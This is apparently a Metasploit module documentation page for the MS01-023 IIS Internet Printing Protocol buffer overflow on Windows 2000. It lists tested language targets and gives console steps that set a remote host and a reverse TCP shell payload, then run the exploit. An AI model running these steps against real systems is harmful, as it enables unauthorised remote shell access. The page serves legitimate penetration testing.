Path: blob/master/documentation/modules/exploit/windows/iis/ms01_023_printer.md
Vulnerable Application
This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 Server and Professional SP0-SP1.
If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.
This module has been tested successfully on:
Windows 2000 Professional SP0 (Dutch)
Windows 2000 Professional SP0 (Finnish)
Windows 2000 Professional SP0 (Greek)
Windows 2000 Professional SP0 (Korean)
Windows 2000 Professional SP0 (Turkish)
Windows 2000 Professional SP1 (Arabic)
Windows 2000 Professional SP1 (Czech)
Windows 2000 Professional SP1 (English)
Windows 2000 Professional SP1 (Greek)
Windows 2000 Server SP0 (Chinese)
Windows 2000 Server SP0 (Dutch)
Windows 2000 Server SP0 (English)
Windows 2000 Server SP0 (German)
Windows 2000 Server SP0 (Hungarian)
Windows 2000 Server SP0 (Italian)
Windows 2000 Server SP0 (Portuguese)
Windows 2000 Server SP0 (Spanish)
Windows 2000 Server SP0 (Turkish)
Windows 2000 Server SP1 (English)
Windows 2000 Server SP1 (French)
Windows 2000 Server SP1 (Swedish)
Verification Steps
use exploit/windows/iis/ms01_023_printer
set RHOSTS [IP]
show targets (to see the possible targets)
set TARGET [TARGET]
set PAYLOAD windows/shell/reverse_tcp
set LHOST [IP]
run